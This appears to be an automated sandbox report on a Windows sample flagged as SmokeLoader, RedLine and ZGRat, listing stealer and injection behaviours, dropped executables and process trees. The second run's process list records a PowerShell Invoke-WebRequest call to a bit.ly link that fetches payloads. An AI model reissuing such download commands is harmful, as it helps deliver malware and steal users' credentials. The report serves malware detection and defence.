Malware Analysis Report

2025-03-15 05:01

Sample ID 231218-1n8ccafcf3
Target b67151e07936533f3b38355566e47650.exe
SHA256 bf4e0ba12be5590ba80c2d595c166a8c2d36d6baf2770c8d1da20e64ea898367
Tags
smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat 666 rat spyware stealer
score
10/10

Analysis Overview

Threat Level: Known bad

The file b67151e07936533f3b38355566e47650.exe was found to be: Known bad.

Malicious Activity Summary

ZGRat

SmokeLoader

RedLine

Detect ZGRat V1

Smokeloader family

RedLine payload

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Deletes itself

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 21:48

Signatures

Smokeloader family

smokeloader

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 21:48

Reported

2023-12-18 21:51

Platform

win7-20231215-en

Max time kernel

27s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

Signatures

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe
PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe
PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe
PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

C:\Users\Admin\AppData\Local\Temp\626B.exe

C:\Users\Admin\AppData\Local\Temp\626B.exe

C:\Users\Admin\AppData\Local\Temp\7946.exe

C:\Users\Admin\AppData\Local\Temp\7946.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

Network

Files

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 21:48

Reported

2023-12-18 21:51

Platform

win10v2004-20231215-en

Max time kernel

46s

Max time network

85s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

Signatures

Detect ZGRat V1

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F63.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3092 set thread context of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeCreatePagefilePrivilege | N/A | N/A | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3480 wrote to memory of 4472 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F63.exe
PID 3480 wrote to memory of 4472 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F63.exe
PID 3480 wrote to memory of 4472 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F63.exe
PID 3480 wrote to memory of 3092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe
PID 3480 wrote to memory of 3092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe
PID 3480 wrote to memory of 3092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

C:\Users\Admin\AppData\Local\Temp\4F63.exe

C:\Users\Admin\AppData\Local\Temp\4F63.exe

C:\Users\Admin\AppData\Local\Temp\67CE.exe

C:\Users\Admin\AppData\Local\Temp\67CE.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\96EE.exe

C:\Users\Admin\AppData\Local\Temp\96EE.exe

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\A680.exe

C:\Users\Admin\AppData\Local\Temp\A680.exe

Network

Files
